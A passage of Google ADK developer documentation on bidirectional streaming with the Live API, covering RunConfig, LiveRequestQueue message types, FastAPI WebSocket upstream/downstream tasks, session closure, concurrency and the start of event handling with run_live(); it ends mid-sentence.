[main.py:110-124](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L110-L124) ```python from google.adk.agents.run_config import RunConfig, StreamingMode from google.genai import types # Native audio models require AUDIO response modality with audio transcription response_modalities = ["AUDIO"] run_config = RunConfig( streaming_mode=StreamingMode.BIDI, response_modalities=response_modalities, input_audio_transcription=types.AudioTranscriptionConfig(), output_audio_transcription=types.AudioTranscriptionConfig(), session_resumption=types.SessionResumptionConfig() ) ``` `RunConfig` is **session-specific**—each streaming session can have different configuration. For example, one user might prefer text-only responses while another uses voice mode. See [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) for complete configuration options. #### Create LiveRequestQueue `LiveRequestQueue` is the communication channel for sending messages to the agent during streaming. It's a thread-safe async queue that buffers user messages (text content, audio blobs, activity signals) for orderly processing. Demo implementation: [main.py:163](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L163) ```python from google.adk.agents.live_request_queue import LiveRequestQueue live_request_queue = LiveRequestQueue() ``` `LiveRequestQueue` is **session-specific and stateful**—you create a new queue for each streaming session and close it when the session ends. Unlike `Agent` and `Runner`, queues cannot be reused across sessions. One Queue Per Session Never reuse a `LiveRequestQueue` across multiple streaming sessions. Each call to `run_live()` requires a fresh queue. Reusing queues can cause message ordering issues and state corruption. The close signal persists in the queue (see [`live_request_queue.py:59-60`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/agents/live_request_queue.py#L66-L67)) and terminates the sender loop (see [`base_llm_flow.py:264-266`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L260-L262)). Reusing a queue would carry over this signal and any remaining messages from the previous session. ### Phase 3: Bidi-streaming with `run_live()` event loop Once the streaming loop is running, you can send messages to the agent and receive responses **concurrently**—this is Bidi-streaming in action. The agent can be generating a response while you're sending new input, enabling natural interruption-based conversation. #### Send Messages to the Agent Use `LiveRequestQueue` methods to send different types of messages to the agent during the streaming session: Demo implementation: [main.py:169-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L217) ```python from google.genai import types # Send text content content = types.Content(parts=[types.Part(text=json_message["text"])]) live_request_queue.send_content(content) # Send audio blob audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) ``` These methods are **non-blocking**—they immediately add messages to the queue without waiting for processing. This enables smooth, responsive user experiences even during heavy AI processing. See [Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) for detailed API documentation. #### Receive and Process Events The `run_live()` async generator continuously yields `Event` objects as the agent processes input and generates responses. Each event represents a discrete occurrence—partial text generation, audio chunks, tool execution, transcription, interruption, or turn completion. Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ```python async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) await websocket.send_text(event_json) ``` Events are designed for **streaming delivery**—you receive partial responses as they're generated, not just complete messages. This enables real-time UI updates and responsive user experiences. See [Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) for comprehensive event handling patterns. ### Phase 4: Terminate Live API session When the streaming session should end (user disconnects, conversation completes, timeout occurs), close the queue gracefully to signal termination to terminate the Live API session. #### Close the Queue Send a close signal through the queue to terminate the streaming loop: Demo implementation: [main.py:253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L253) ```python live_request_queue.close() ``` This signals `run_live()` to stop yielding events and exit the async generator loop. The agent completes any in-progress processing and the streaming session ends cleanly. ### FastAPI Application Example Here's a complete FastAPI WebSocket application showing all four phases integrated with proper Bidi-streaming. The key pattern is **upstream/downstream tasks**: the upstream task receives messages from WebSocket and sends them to `LiveRequestQueue`, while the downstream task receives `Event` objects from `run_live()` and sends them to WebSocket. Complete Demo Implementation For the production-ready implementation with multimodal support (text, audio, image), see the complete [`main.py`](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py) file. **Complete Implementation:** ```python import asyncio from fastapi import FastAPI, WebSocket, WebSocketDisconnect from google.adk.runners import Runner from google.adk.agents.run_config import RunConfig, StreamingMode from google.adk.agents.live_request_queue import LiveRequestQueue from google.adk.sessions import InMemorySessionService from google.genai import types from google_search_agent.agent import agent # ======================================== # Phase 1: Application Initialization (once at startup) # ======================================== APP_NAME = "bidi-demo" app = FastAPI() # Define your session service session_service = InMemorySessionService() # Define your runner runner = Runner( app_name=APP_NAME, agent=agent, session_service=session_service ) # ======================================== # WebSocket Endpoint # ======================================== @app.websocket("/ws/{user_id}/{session_id}") async def websocket_endpoint(websocket: WebSocket, user_id: str, session_id: str) -> None: await websocket.accept() # ======================================== # Phase 2: Session Initialization (once per streaming session) # ======================================== # Create RunConfig response_modalities = ["AUDIO"] run_config = RunConfig( streaming_mode=StreamingMode.BIDI, response_modalities=response_modalities, input_audio_transcription=types.AudioTranscriptionConfig(), output_audio_transcription=types.AudioTranscriptionConfig(), session_resumption=types.SessionResumptionConfig() ) # Get or create session session = await session_service.get_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) if not session: await session_service.create_session( app_name=APP_NAME, user_id=user_id, session_id=session_id ) # Create LiveRequestQueue live_request_queue = LiveRequestQueue() # ======================================== # Phase 3: Active Session (concurrent bidirectional communication) # ======================================== async def upstream_task() -> None: """Receives messages from WebSocket and sends to LiveRequestQueue.""" try: while True: # Receive text message from WebSocket data: str = await websocket.receive_text() # Send to LiveRequestQueue content = types.Content(parts=[types.Part(text=data)]) live_request_queue.send_content(content) except WebSocketDisconnect: # Client disconnected - signal queue to close pass async def downstream_task() -> None: """Receives Events from run_live() and sends to WebSocket.""" async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): # Send event as JSON to WebSocket await websocket.send_text( event.model_dump_json(exclude_none=True, by_alias=True) ) # Run both tasks concurrently try: await asyncio.gather( upstream_task(), downstream_task(), return_exceptions=True ) finally: # ======================================== # Phase 4: Session Termination # ======================================== # Always close the queue, even if exceptions occurred live_request_queue.close() ``` Async Context Required All ADK bidirectional streaming applications **must run in an async context**. This requirement comes from multiple components: - **`run_live()`**: ADK's streaming method is an async generator with no synchronous wrapper (unlike `run()`) - **Session operations**: `get_session()` and `create_session()` are async methods - **WebSocket operations**: FastAPI's `websocket.accept()`, `receive_text()`, and `send_text()` are all async - **Concurrent tasks**: The upstream/downstream pattern requires `asyncio.gather()` for concurrent execution All code examples in this guide assume you're running in an async context (e.g., within an async function or coroutine). For consistency with ADK's official documentation patterns, examples show the core logic without boilerplate wrapper functions. ### Key Concepts **Upstream Task (WebSocket → LiveRequestQueue)** The upstream task continuously receives messages from the WebSocket client and forwards them to the `LiveRequestQueue`. This enables the user to send messages to the agent at any time, even while the agent is generating a response. Demo implementation: [main.py:169-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L217) ```python async def upstream_task() -> None: """Receives messages from WebSocket and sends to LiveRequestQueue.""" try: while True: data: str = await websocket.receive_text() content = types.Content(parts=[types.Part(text=data)]) live_request_queue.send_content(content) except WebSocketDisconnect: pass # Client disconnected ``` **Downstream Task (run_live() → WebSocket)** The downstream task continuously receives `Event` objects from `run_live()` and sends them to the WebSocket client. This streams the agent's responses, tool executions, transcriptions, and other events to the user in real-time. Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ```python async def downstream_task() -> None: """Receives Events from run_live() and sends to WebSocket.""" async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): await websocket.send_text( event.model_dump_json(exclude_none=True, by_alias=True) ) ``` **Concurrent Execution with Cleanup** Both tasks run concurrently using `asyncio.gather()`, enabling true Bidi-streaming. The `try/finally` block ensures `LiveRequestQueue.close()` is called even if exceptions occur, minimizing the session resource usage. Demo implementation: [main.py:238-253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L238-L253) ```python try: await asyncio.gather( upstream_task(), downstream_task(), return_exceptions=True ) finally: live_request_queue.close() # Always cleanup ``` This pattern—concurrent upstream/downstream tasks with guaranteed cleanup—is the foundation of production-ready streaming applications. The lifecycle pattern (initialize once, stream many times) enables efficient resource usage and clean separation of concerns, with application components remaining stateless and reusable while session-specific state is isolated in `LiveRequestQueue`, `RunConfig`, and session records. #### Production Considerations This example shows the core pattern. For production applications, consider: - **Error handling (ADK)**: Add proper error handling for ADK streaming events. For details on error event handling, see [Part 3: Error Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#error-events). - Handle task cancellation gracefully by catching `asyncio.CancelledError` during shutdown - Check exceptions from `asyncio.gather()` with `return_exceptions=True` - exceptions don't propagate automatically - **Error handling (Web)**: Handle web application-specific errors in upstream/downstream tasks. For example, with FastAPI you would need to: - Catch `WebSocketDisconnect` (client disconnected), `ConnectionClosedError` (connection lost), and `RuntimeError` (sending to closed connection) - Validate WebSocket connection state before sending with `websocket.client_state` to prevent errors when the connection is closed - **Authentication and authorization**: Implement authentication and authorization for your endpoints - **Rate limiting and quotas**: Add rate limiting and timeout controls. For guidance on concurrent sessions and quota management, see [Part 4: Concurrent Live API Sessions and Quota Management](https://google.github.io/adk-docs/streaming/dev-guide/part4/#concurrent-live-api-sessions-and-quota-management). - **Structured logging**: Use structured logging for debugging. - **Persistent session services**: Consider using persistent session services (`DatabaseSessionService` or `VertexAiSessionService`). See the [ADK Session Services documentation](https://google.github.io/adk-docs/sessions/) for more details. ## 1.6 What We Will Learn This guide takes you through ADK's Bidi-streaming architecture step by step, following the natural flow of streaming applications: how messages travel upstream from users to agents, how events flow downstream from agents to users, how to configure session behaviors, and how to implement multimodal features. Each part focuses on a specific component of the streaming architecture with practical patterns you can apply immediately: - **[Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md)** - Learn how ADK's `LiveRequestQueue` provides a unified interface for handling text, audio, and control messages. You'll understand the `LiveRequest` message model, how to send different types of content, manage user activity signals, and handle graceful session termination through a single, elegant API. - **[Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md)** - Master event handling in ADK's streaming architecture. Learn how to process different event types (text, audio, transcriptions, tool calls), manage conversation flow with interruption and turn completion signals, serialize events for network transport, and leverage ADK's automatic tool execution. Understanding event handling is essential for building responsive streaming applications. - **[Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md)** - Configure sophisticated streaming behaviors including multimodal interactions, intelligent proactivity, session resumption, and cost controls. Learn which features are available on different models and how to declaratively control your streaming sessions through RunConfig. - **[Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md)** - Implement voice and video features with ADK's multimodal capabilities. Understand audio specifications, streaming architectures, voice activity detection, audio transcription, and best practices for building natural voice-enabled AI experiences. ### Prerequisites and Learning Resources For building an ADK Bidi-streaming application in production, we recommend having basic knowledge of the following technologies: **[ADK (Agent Development Kit)](https://google.github.io/adk-docs/)** Google's production-ready framework for building AI agents with streaming capabilities. ADK provides high-level abstractions for session management, tool orchestration, and state persistence, eliminating the need to implement low-level streaming infrastructure from scratch. **Live API ([Gemini Live API](https://ai.google.dev/gemini-api/docs/live) and [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api))** Google's real-time conversational AI technology that enables low-latency bidirectional streaming with Gemini models. The Live API provides the underlying WebSocket-based protocol that powers ADK's streaming capabilities, handling multimodal input/output and natural conversation flow. **[Python Async Programming](https://docs.python.org/3/library/asyncio.html)** Python's built-in support for asynchronous programming using `async`/`await` syntax and the `asyncio` library. ADK streaming is built on async generators and coroutines, requiring familiarity with concepts like async functions, awaiting tasks, and concurrent execution with `asyncio.gather()`. **[Pydantic](https://docs.pydantic.dev/)** A Python library for data validation and settings management using Python type annotations. ADK uses Pydantic models extensively for structured data (like `Event`, `RunConfig`, and `Content`), providing type safety, automatic validation, and JSON serialization via `.model_dump_json()`. **[FastAPI](https://fastapi.tiangolo.com/)** A modern, high-performance Python web framework for building APIs with automatic OpenAPI documentation. FastAPI's native support for WebSockets and async request handling makes it ideal for building ADK streaming endpoints. FastAPI is included in the `adk-python` package and used by ADK's `adk web` tool for rapid prototyping. Alternative frameworks with WebSocket support (like Flask-SocketIO or Starlette) can also be used. **[WebSockets](https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API)** A protocol providing full-duplex (two-way) communication channels over a single TCP connection. WebSockets enable real-time bidirectional data flow between clients and servers, making them the standard transport for streaming applications. Unlike HTTP request-response, WebSocket connections persist, allowing both parties to send messages at any time. **[SSE (Server-Sent Events)](https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events)** A standard for servers to push data to web clients over HTTP. Unlike WebSockets, SSE is unidirectional (server-to-client only), making it simpler but less flexible. SSE is useful for streaming agent responses when you don't need client-to-server streaming, such as when user input comes through separate HTTP POST requests. While this guide covers ADK-specific concepts thoroughly, familiarity with these underlying technologies will help you build more robust production applications. ## Summary In this introduction, you learned how ADK transforms complex real-time streaming infrastructure into a developer-friendly framework. We covered the fundamentals of Live API's bidirectional streaming capabilities, examined how ADK simplifies the streaming complexity through abstractions like `LiveRequestQueue`, `Runner`, and `run_live()`, and explored the complete application lifecycle from initialization through session termination. You now understand how ADK handles the heavy lifting—LLM-side streaming connection management, state persistence, platform differences, and event coordination—so you can focus on building intelligent agent experiences. With this foundation in place, you're ready to dive into the specifics of sending messages, handling events, configuring sessions, and implementing multimodal features in the following parts. ______________________________________________________________________ [Next: Part 2: Sending Messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) → # Part 2: Sending messages with LiveRequestQueue In Part 1, you learned the four-phase lifecycle of ADK Bidi-streaming applications. This part focuses on the upstream flow—how your application sends messages to the agent using `LiveRequestQueue`. Unlike traditional APIs where different message types require different endpoints or channels, ADK provides a single unified interface through `LiveRequestQueue` and its `LiveRequest` message model. This part covers: - **Message types**: Sending text via `send_content()`, streaming audio/image/video via `send_realtime()`, controlling conversation turns with activity signals, and gracefully terminating sessions with control signals - **Concurrency patterns**: Understanding async queue management and event-loop thread safety - **Best practices**: Creating queues in async context, ensuring proper resource cleanup, and understanding message ordering guarantees - **Troubleshooting**: Diagnosing common issues like messages not being processed and queue lifecycle problems Understanding `LiveRequestQueue` is essential for building responsive streaming applications that handle multimodal inputs seamlessly within async event loops. ## LiveRequestQueue and LiveRequest The `LiveRequestQueue` is your primary interface for sending messages to the Agent in streaming conversations. Rather than managing separate channels for text, audio, and control signals, ADK provides a unified `LiveRequest` container that handles all message types through a single, elegant API: Source reference: [live_request_queue.py](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/agents/live_request_queue.py) ```python class LiveRequest(BaseModel): content: Optional[Content] = None # Text-based content and structured data blob: Optional[Blob] = None # Audio/video data and binary streams activity_start: Optional[ActivityStart] = None # Signal start of user activity activity_end: Optional[ActivityEnd] = None # Signal end of user activity close: bool = False # Graceful connection termination signal ``` This streamlined design handles every streaming scenario you'll encounter. The `content` and `blob` fields handle different data types, the `activity_start` and `activity_end` fields enable activity signaling, and the `close` flag provides graceful termination semantics. The `content` and `blob` fields are mutually exclusive—only one can be set per LiveRequest. While ADK does not enforce this client-side and will attempt to send both if set, the Live API backend will reject this with a validation error. ADK's convenience methods `send_content()` and `send_realtime()` automatically ensure this constraint is met by setting only one field, so **using these methods (rather than manually creating `LiveRequest` objects) is the recommended approach**. The following diagram illustrates how different message types flow from your application through `LiveRequestQueue` methods, into `LiveRequest` containers, and finally to the Live API: ``` graph LR subgraph "Application" A1[User Text Input] A2[Audio Stream] A3[Activity Signals] A4[Close Signal] end subgraph "LiveRequestQueue Methods" B1[send_content
Content] B2[send_realtime
Blob] B3[send_activity_start
ActivityStart] B3b[send_activity_end
ActivityEnd] B4[close
close=True] end subgraph "LiveRequest Container" C1[content: Content] C2[blob: Blob] C3[activity_start/end] C4[close: bool] end subgraph "Gemini Live API" D[WebSocket Connection] end A1 --> B1 --> C1 --> D A2 --> B2 --> C2 --> D A3 --> B3 --> C3 --> D A3 --> B3b --> C3 A4 --> B4 --> C4 --> D ``` ## Sending Different Message Types `LiveRequestQueue` provides convenient methods for sending different message types to the agent. This section demonstrates practical patterns for text messages, audio/video streaming, activity signals for manual turn control, and session termination. ### send_content(): Sends Text With Turn-by-Turn The `send_content()` method sends text messages in turn-by-turn mode, where each message represents a discrete conversation turn. This signals a complete turn to the model, triggering immediate response generation. Demo implementation: [main.py:194-199](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L194-L199) ```python content = types.Content(parts=[types.Part(text=json_message["text"])]) live_request_queue.send_content(content) ``` **Using Content and Part with ADK Bidi-streaming:** - **`Content`** (`google.genai.types.Content`): A container that represents a single message or turn in the conversation. It holds an array of `Part` objects that together compose the complete message. - **`Part`** (`google.genai.types.Part`): An individual piece of content within a message. For ADK Bidi-streaming with Live API, you'll use: - `text`: Text content (including code) that you send to the model In practice, most messages use a single text Part for ADK Bidi-streaming. The multi-part structure is designed for scenarios like: - Mixing text with function responses (automatically handled by ADK) - Combining text explanations with structured data - Future extensibility for new content types For Live API, multimodal inputs (audio/video) use different mechanisms (see `send_realtime()` below), not multi-part Content. Content and Part usage in ADK Bidi-streaming While the Gemini API `Part` type supports many fields (`inline_data`, `file_data`, `function_call`, `function_response`, etc.), most are either handled automatically by ADK or use different mechanisms in Live API: - **Function calls**: ADK automatically handles the function calling loop - receiving function calls from the model, executing your registered functions, and sending responses back. You don't manually construct these. - **Images/Video**: Do NOT use `send_content()` with `inline_data`. Instead, use `send_realtime(Blob(mime_type="image/jpeg", data=...))` for continuous streaming. See [Part 5: How to Use Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/#how-to-use-image-and-video). ### send_realtime(): Sends Audio, Image and Video in Real-Time The `send_realtime()` method sends binary data streams—primarily audio, image and video—flow through the `Blob` type, which handles transmission in realtime mode. Unlike text content that gets processed in turn-by-turn mode, blobs are designed for continuous streaming scenarios where data arrives in chunks. You provide raw bytes, and Pydantic automatically handles base64 encoding during JSON serialization for safe network transmission (configured in `LiveRequest.model_config`). The MIME type helps the model understand the content format. Demo implementation: [main.py:181-184](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L181-L184) ```python audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) ``` Learn More For complete details on audio, image and video specifications, formats, and best practices, see [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md). ### Activity Signals Activity signals (`ActivityStart`/`ActivityEnd`) can **ONLY** be sent when automatic (server-side) Voice Activity Detection is **explicitly disabled** in your `RunConfig`. Use them when your application requires manual voice activity control, such as: - **Push-to-talk interfaces**: User explicitly controls when they're speaking (e.g., holding a button) - **Noisy environments**: Background noise makes automatic VAD unreliable, so you use client-side VAD or manual control - **Client-side VAD**: You implement your own VAD algorithm on the client to reduce network overhead by only sending audio when speech is detected - **Custom interaction patterns**: Non-speech scenarios like gesture-triggered interactions or timed audio segments **What activity signals tell the model:** - `ActivityStart`: "The user is now speaking - start accumulating audio for processing" - `ActivityEnd`: "The user has finished speaking - process the accumulated audio and generate a response" Without these signals (when VAD is disabled), the model doesn't know when to start/stop listening for speech, so you must explicitly mark turn boundaries. **Sending Activity Signals:** ```python from google.genai import types # Manual activity signal pattern (e.g., push-to-talk) live_request_queue.send_activity_start() # Signal: user started speaking # Stream audio chunks while user holds the talk button while user_is_holding_button: audio_blob = types.Blob(mime_type="audio/pcm;rate=16000", data=audio_chunk) live_request_queue.send_realtime(audio_blob) live_request_queue.send_activity_end() # Signal: user stopped speaking ``` **Default behavior (automatic VAD):** If you don't send activity signals, Live API's built-in VAD automatically detects speech boundaries in the audio stream you send via `send_realtime()`. This is the recommended approach for most applications. Learn More For detailed comparison of automatic VAD vs manual activity signals, including when to disable VAD and best practices, see [Part 5: Voice Activity Detection](https://google.github.io/adk-docs/streaming/dev-guide/part5/#voice-activity-detection-vad). ### Control Signals The `close` signal provides graceful termination semantics for streaming sessions. It signals the system to cleanly close the model connection and end the Bidi-stream. In ADK Bidi-streaming, your application is responsible for sending the `close` signal explicitly: **Manual closure in BIDI mode:** When using `StreamingMode.BIDI` (Bidi-streaming), your application should manually call `close()` when the session terminates or when errors occur. This practice minimizes session resource usage. **Automatic closure in SSE mode:** When using the legacy `StreamingMode.SSE` (not Bidi-streaming), ADK automatically calls `close()` on the queue when it receives a `turn_complete=True` event from the model (see [`base_llm_flow.py:781`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L780)). See [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/#streamingmode-bidi-or-sse) for detailed comparison and when to use each mode. Demo implementation: [main.py:238-253](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L238-L253) ```python try: logger.debug("Starting asyncio.gather for upstream and downstream tasks") await asyncio.gather( upstream_task(), downstream_task() ) logger.debug("asyncio.gather completed normally") except WebSocketDisconnect: logger.debug("Client disconnected normally") except Exception as e: logger.error(f"Unexpected error in streaming tasks: {e}", exc_info=True) finally: # Always close the queue, even if exceptions occurred logger.debug("Closing live_request_queue") live_request_queue.close() ``` **What happens if you don't call close()?** Although ADK cleans up local resources automatically, failing to call `close()` in BIDI mode prevents sending a graceful termination signal to the Live API, which will then receive an abrupt disconnection after certain timeout period. This can lead to "zombie" Live API sessions that remain open on the cloud service, even though your application has finished with them. These stranded sessions may significantly decrease the number of concurrent sessions your application can handle, as they continue to count against your quota limits until they eventually timeout. Learn More For comprehensive error handling patterns during streaming, including when to use `break` vs `continue` and handling different error types, see [Part 3: Error Events](https://google.github.io/adk-docs/streaming/dev-guide/part3/#error-events). ## Concurrency and Thread Safety Understanding how `LiveRequestQueue` handles concurrency is essential for building reliable streaming applications. The queue is built on `asyncio.Queue`, which means it's safe for concurrent access **within the same event loop thread** (the common case), but requires special handling when called from **different threads** (the advanced case). This section explains the design choices behind `LiveRequestQueue`'s API, when you can safely use it without extra precautions, and when you need thread-safety mechanisms like `loop.call_soon_threadsafe()`. ### Async Queue Management `LiveRequestQueue` uses synchronous methods (`send_content()`, `send_realtime()`) instead of async methods, even though the underlying queue is consumed asynchronously. This design choice uses `asyncio.Queue.put_nowait()` - a non-blocking operation that doesn't require `await`. **Why synchronous send methods?** Convenience and simplicity. You can call them from anywhere in your async code without `await`: Demo implementation: [main.py:169-199](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L169-L199) ```python async def upstream_task() -> None: """Receives messages from WebSocket and sends to LiveRequestQueue.""" while True: message = await websocket.receive() if "bytes" in message: audio_data = message["bytes"] audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) elif "text" in message: text_data = message["text"] json_message = json.loads(text_data) if json_message.get("type") == "text": content = types.Content(parts=[types.Part(text=json_message["text"])]) live_request_queue.send_content(content) ``` This pattern mixes async I/O operations with sync CPU operations naturally. The send methods return immediately without blocking, allowing your application to stay responsive. #### Best Practice: Create Queue in Async Context Always create `LiveRequestQueue` within an async context (async function or coroutine) to ensure it uses the correct event loop: ```python # ✅ Recommended - Create in async context async def main(): queue = LiveRequestQueue() # Uses existing event loop from async context # This is the preferred pattern - ensures queue uses the correct event loop # that will run your streaming operations # ❌ Not recommended - Creates event loop automatically queue = LiveRequestQueue() # Works but ADK auto-creates new loop # This works due to ADK's safety mechanism, but may cause issues with # loop coordination in complex applications or multi-threaded scenarios ``` **Why this matters:** `LiveRequestQueue` requires an event loop to exist when instantiated. ADK includes a safety mechanism that auto-creates a loop if none exists, but relying on this can cause unexpected behavior in multi-threaded scenarios or with custom event loop configurations. ## Message Ordering Guarantees `LiveRequestQueue` provides predictable message delivery behavior: | Guarantee | Description | Impact | | ------------------------ | --------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **FIFO ordering** | Messages processed in send order (guaranteed by underlying `asyncio.Queue`) | Maintains conversation context and interaction consistency | | **No coalescing** | Each message delivered independently | No automatic batching—each send operation creates one request | | **Unbounded by default** | Queue accepts unlimited messages without blocking | **Benefit**: Simplifies client code (no blocking on send) **Risk**: Memory growth if sending faster than processing **Mitigation**: Monitor queue depth in production | > **Production Tip**: For high-throughput audio/video streaming, monitor `live_request_queue._queue.qsize()` to detect backpressure. If the queue depth grows continuously, slow down your send rate or implement batching. Note: `_queue` is an internal attribute and may change in future releases; use with caution. ## Summary In this part, you learned how `LiveRequestQueue` provides a unified interface for sending messages to ADK streaming agents within an async event loop. We covered the `LiveRequest` message model and explored how to send different message types: text content via `send_content()`, audio/video blobs via `send_realtime()`, activity signals for manual turn control, and control signals for graceful termination via `close()`. You also learned best practices for async queue management, creating queues in async context, resource cleanup, and message ordering. You now understand how to use `LiveRequestQueue` as the upstream communication channel in your Bidi-streaming applications, enabling users to send messages concurrently while receiving agent responses. Next, you'll learn how to handle the downstream flow—processing the events that agents generate in response to these messages. ______________________________________________________________________ ← [Previous: Part 1: Introduction to ADK Bidi-streaming](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) | [Next: Part 3: Event Handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) → # Part 3: Event handling with run_live() The `run_live()` method is ADK's primary entry point for streaming conversations, implementing an async generator that yields events as the conversation unfolds. This part focuses on understanding and handling these events—the core communication mechanism that enables real-time interaction between your application, users, and AI models. You'll learn how to process different event types (text, audio, transcriptions, tool calls), manage conversation flow with interruption and turn completion signals, serialize events for network transport, and leverage ADK's automatic tool execution. Understanding event handling is essential for building responsive streaming applications that feel natural and real-time to users. Async Context Required All `run_live()` code requires async context. See [Part 1: FastAPI Application Example](https://google.github.io/adk-docs/streaming/dev-guide/part1/#fastapi-application-example) for details and production examples. ## How run_live() Works `run_live()` is an async generator that streams conversation events in real-time. It yields events immediately as they're generated—no buffering, no polling, no callbacks. Events are streamed without internal buffering. Overall memory depends on session persistence (e.g., in-memory vs database), making it suitable for both quick exchanges and extended sessions. ### Method Signature and Flow **Usage:** Source reference: [runners.py](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py) ```python # The method signature reveals the thoughtful design async def run_live( self, *, # Keyword-only arguments user_id: Optional[str] = None, # User identification (required unless session provided) session_id: Optional[str] = None, # Session tracking (required unless session provided) live_request_queue: LiveRequestQueue, # The bidirectional communication channel run_config: Optional[RunConfig] = None, # Streaming behavior configuration session: Optional[Session] = None, # Deprecated: use user_id and session_id instead ) -> AsyncGenerator[Event, None]: # Generator yielding conversation events ``` As its signature tells, every streaming conversation needs identity (user_id), continuity (session_id), communication (live_request_queue), and configuration (run_config). The return type—an async generator of Events—promises real-time delivery without overwhelming system resources. ``` sequenceDiagram participant Client participant Runner participant Agent participant LLMFlow participant Gemini Client->>Runner: runner.run_live(user_id, session_id, queue, config) Runner->>Agent: agent.run_live(context) Agent->>LLMFlow: _llm_flow.run_live(context) LLMFlow->>Gemini: Connect and stream loop Continuous Streaming Gemini-->>LLMFlow: LlmResponse LLMFlow-->>Agent: Event Agent-->>Runner: Event Runner-->>Client: Event (yield) end ``` ### Basic Usage Pattern The simplest way to consume events from `run_live()` is to iterate over the async generator with a for-loop: Demo implementation: [main.py:225-233](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L225-L233) ```python async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) logger.debug(f"[SERVER] Event: {event_json}") await websocket.send_text(event_json) ``` Session Identifiers Both `user_id` and `session_id` must match the identifiers you used when creating the session via `SessionService.create_session()`. These can be any string values based on your application's needs (e.g., UUIDs, email addresses, custom tokens). See [Part 1: Get or Create Session](https://google.github.io/adk-docs/streaming/dev-guide/part1/#get-or-create-session) for detailed guidance on session identifiers. ### Connection Lifecycle in run_live() The `run_live()` method manages the underlying Live API connection lifecycle automatically: **Connection States:** 1. **Initialization**: Connection established when `run_live()` is called 1. **Active Streaming**: Bidirectional communication via `LiveRequestQueue` (upstream to the model) and `run_live()` (downstream from the model) 1. **Graceful Closure**: Connection closes when `LiveRequestQueue.close()` is called 1. **Error Recovery**: ADK supports transparent session resumption; enable via `RunConfig.session_resumption` to handle transient failures. See [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption) for details. #### What run_live() Yields The `run_live()` method yields a stream of `Event` objects in real-time as 